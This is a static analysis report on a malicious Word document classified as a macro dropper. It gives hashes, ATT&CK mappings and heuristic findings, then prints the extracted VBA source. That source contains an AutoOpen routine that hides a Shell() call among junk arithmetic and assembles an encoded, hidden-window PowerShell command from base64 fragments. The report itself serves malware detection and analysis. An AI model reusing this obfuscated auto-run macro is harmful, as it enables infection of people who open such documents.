Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 176ba761ef11ff26…

MALICIOUS

Office (OLE)

Size: 93.5 KB
Created: 2018-05-29 19:25:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 7783e2ffa96e23344526a6f2d3a303c6
SHA-1: 142d09e809eb23ff82fbe2d132552c025a7d40a1
SHA-256: 176ba761ef11ff26fe967027ebc373f90d9ad8eddfd5cd2d9066754b6619d843
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6565439-0' further supports this dropper-like behavior. The macro's obfuscated nature and the use of Shell() suggest a high likelihood of malicious intent.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6565439-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565439-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15357 bytes
SHA-256: 397ad3c4ef30df78487d5e041cb1f37b8d82523720343edfa3ae4288e395fb5d
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "RsjhYVLXtZaq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zYqwqlnlER()
On Error Resume Next
tsICjt = Atn(4887 * CInt(79950) + 15653 - 31196)
wWXLoi = 65112 + _
Log(4756) - ntQRRX / Atn(60920) / FcZdMa / dckub
wYJREr = Atn(6900 * CInt(83596) + 17903 - 92665)
DLHAcr = 71285 + _
Log(23995) - UjfqV / Atn(69638) / IiMzna / qUGAN
zYqwqlnlER = Qfrikpun + saQORdR + JHjpG + rQHDH + QzozPvsa + UXLWUWROpzu + XXWPFoX + zdaGfKr
cqwjva = Atn(2833 * CInt(36751) + 28310 - 2088)
zhOZMt = 36055 + _
Log(92014) - vvJzw / Atn(80173) / HQjVrX / linzvv
End Function
Sub Autoopen()
On Error Resume Next
ctjbzF = Atn(24521 * CInt(58258) + 57744 - 51590)
Eskjjz = 64296 + _
Log(11994) - tCiftb / Atn(2762) / uZtXAl / BcWBj
uriNi (zYqwqlnlER)
dmFhn = Atn(59802 * CInt(91090) + 8826 - 95946)
RowpaL = 2326 + _
Log(65002) - EkjEj / Atn(31484) / HSfEd / WjPPcw
End Sub
Function uriNi(SOYKDLl)
On Error Resume Next
wGXwl = Atn(53902 * CInt(67189) + 3890 - 93032)
pboffj = 87842 + _
Log(65832) - QjXcY / Atn(87876) / lSSZK / CbYwMn
VLjLwEZHB = HzZDENtw + Chr(vbKeyP) + IYjSbjaTQ
EhBKa = Atn(80292 * CInt(55488) + 78685 - 542)
AWhEhX = 48102 + _
Log(55917) - CaqQjX / Atn(64169) / YMGjT / OTjhM
CotsB = rNmvLqLNv + Shell(Gmhwl + VLjLwEZHB + GIMIlsIbXlJ + SOYKDLl + wnOFX, vbHide)
jQWlb = Atn(34426 * CInt(5499) + 56620 - 58678)
EzVNk = 86830 + _
Log(28248) - RnsiE / Atn(53958) / KjQSkw / MaPlDE
End Function



Attribute VB_Name = "RUDcDIHLGVVFS"
Function Qfrikpun()
On Error Resume Next
TLUAfB = Atn(37568 * CInt(81710) + 44540 - 30038)
EHrbv = 13714 + _
Log(36785) - Vbmhip / Atn(19166) / YENQV / UiqYU
SHAEATJzM = "owersH" + "eLL -Win" + "DowsTyle hidde" + "n -e KAAo" + "ACgAI" + "gB7ADk" + "ANQB9AHsANAAyA" + "H0AewAyAH0A" + "ewA0ADY"
wdivQo = Atn(5934 * CInt(60394) + 20943 - 84101)
ijTTX = 62522 + _
Log(56539) - LVsulK / Atn(97479) / rmNlX / srswqR
tBdljJSNUc = "AfQB7AD" + "AAfQB" + "7ADMANAB9" + "AHsAOA" + "AxAH0" + "AewA0ADg" + "AfQB7ADQ" + "AMwB9AHsAMgA"
mizjlf = Atn(69163 * CInt(3110) + 88034 - 94821)
MmJFDi = 86468 + _
Log(72577) - lLtzG / Atn(91505) / ocaapM / YqvOzf
CEhCi = "yAH0AewAyADAA" + "fQB7ADQAOQB9AH" + "sANgA2AH0Aew" + "AxADkAfQB7ADIA" + "OQB9A" + "HsANAA0AH0Aew" + "A4ADIAfQB7ADEA" + "MAAwA" + "H0AewA3ADg"
CzoPY = Atn(69606 * CInt(54426) + 76070 - 76066)
DFzIb = 71809 + _
Log(1049) - qjvZTW / Atn(15583) / ulOIU / GDiNEh
oHziOkspjK = "AfQB7ADEAfQB" + "7ADkAMAB9AH" + "sANgAyAH0AewAz" + "ADUAfQB7ADMA" + "NgB9AHsANAAw" + "AH0AewA2" + "ADUAfQ" + "B7ADcANAB9AH"
LTAoQX = Atn(70146 * CInt(25378) + 68494 - 94285)
unJvS = 55319 + _
Log(59127) - HXpqZ / Atn(58845) / KwvZNj / riPvk
ljMJHOZTKqQ = "sANwAxAH0Ae" + "wA3ADUAfQB7AD" + "gAOAB9AHsAM" + "QAwADIAfQB7A" + "DYANw" + "B9AHsAMQAw" + "AH0AewA3ADkAf" + "QB7ADU"
zXnLo = Atn(17664 * CInt(27832) + 61799 - 68338)
kGila = 21474 + _
Log(42389) - bKaMmR / Atn(19587) / YbwijX / cTkjiC
PbuiCEGFujG = "AMwB9AHsANQAx" + "AH0AewAxADQAfQB" + "7ADYAM" + "wB9AHsAMQAzAH" + "0AewA4ADYAfQB7A" + "DQAfQB7ADIANAB9" + "AHsANwA2AH0AewA" + "4AH0AewA5A" + "DcAfQB" + "7ADEAMA"
QKbnL = Atn(36935 * CInt(59064) + 90718 - 86234)
ImTacm = 72248 + _
Log(42291) - FkmjE / Atn(59484) / OGSqb / aLtQlw
XlRIOCRU = "AxAH0" + "AewA3AH0AewAzAD" + "AAfQB7ADkAM" + "gB9AH" + "sANQAyAH0Ae" + "wA5ADYAfQB7ADMA"
Qfrikpun = SHAEATJzM + tBdljJSNUc + CEhCi + oHziOkspjK + ljMJHOZTKqQ + PbuiCEGFujG + XlRIOCRU
End Function
Function saQORdR()
On Error Resume Next
qEdiP = Atn(41517 * CInt(86826) + 8721 - 33198)
jwNdwf = 56299 + _
Log(50185) - IwEXc / Atn(5456) / RMHjL / mPKAH
cNojjhsfpf = "MgB9AHsAO" + "AAzAH0AewA2" + "ADkAfQB7AD" + "UAOQB9A" + "HsAMwA4AH0Ae" + "wAzADEAfQB7" + "ADkAOAB9AH" + "sANgA4AH0AewA"
UjlHw = Atn(13052 * CInt(72519) + 83763 - 26047)
djQqP = 80930 + _
Log(14623) - jAfKEh / Atn(94001) / ofLwTw / ZFmWq
zvZYHlAfvG = "xADgAfQ" + "B7ADMAfQB7" +
... (truncated)